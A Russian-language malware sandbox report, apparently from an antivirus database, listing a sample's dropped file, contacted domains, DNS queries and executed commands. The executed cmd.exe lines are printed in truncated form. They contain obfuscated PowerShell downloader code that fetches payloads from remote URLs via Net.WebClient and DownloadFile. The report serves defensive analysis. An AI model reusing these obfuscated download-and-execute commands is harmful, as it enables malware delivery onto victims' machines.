Техническая информация
Вредоносные функции
Загружает файлы и запускает на исполнение.
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' \c %ProgramData:~0,1%%ProgramData:~9,2% \V:O\C"set Ta=;'sdkll'=dptfwiq$}}{hctac}};kaerb;'jibmojz'=wfsub$;zzhfk$ metI-ekovnI{ )00004 eg- htgnel.)zzhfk$ metI-teG(( fI;'wqwkzch'=nwiivs$;)zzhfk$ ,m...
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\396.exe
Сетевая активность
Подключается к
- 'ca####ean360.com':80
- 'hu####ningdirect.nl':80
- 'st####holidays.com':80
TCP
Запросы HTTP GET
- http://st####holidays.com/cgi-sys/suspendedpage.cgi
Другие
- 'sa###rocket.com':443
UDP
- DNS ASK sa###rocket.com
- DNS ASK th####hatstore.com
- DNS ASK ca####ean360.com
- DNS ASK hu####ningdirect.nl
- DNS ASK st####holidays.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' \c %ProgramData:~0,1%%ProgramData:~9,2% \V:O\C"set Ta=;'sdkll'=dptfwiq$}}{hctac}};kaerb;'jibmojz'=wfsub$;zzhfk$ metI-ekovnI{ )00004 eg- htgnel.)zzhfk$ metI-teG(( fI;'wqwkzch'=nwiivs$;)zzhfk$ ,m...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /V:O/C"set Ta=;'sdkll'=dptfwiq$}}{hctac}};kaerb;'jibmojz'=wfsub$;zzhfk$ metI-ekovnI{ )00004 eg- htgnel.)zzhfk$ metI-teG(( fI;'wqwkzch'=nwiivs$;)zzhfk$ ,mrcrjz$(eliFdaolnwoD.nqwui${yrt{)iaqjkop$...
- '<SYSTEM32>\cmd.exe' /S /D /c" echo pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $iudwrp='pliir';$iuwqn=new-object Net.WebClient;$pokjqai='http://sa###rocket.com/I3OPEcSBT@http://thinhphatstore.com/hXXTRwBt7...
- '<SYSTEM32>\cmd.exe' /S /D /c" FOR /F "tokens=2 delims==fo" %C IN ('assoc.cmd') DO %C "
- '<SYSTEM32>\cmd.exe' /c assoc.cmd
- '<SYSTEM32>\cmd.exe'
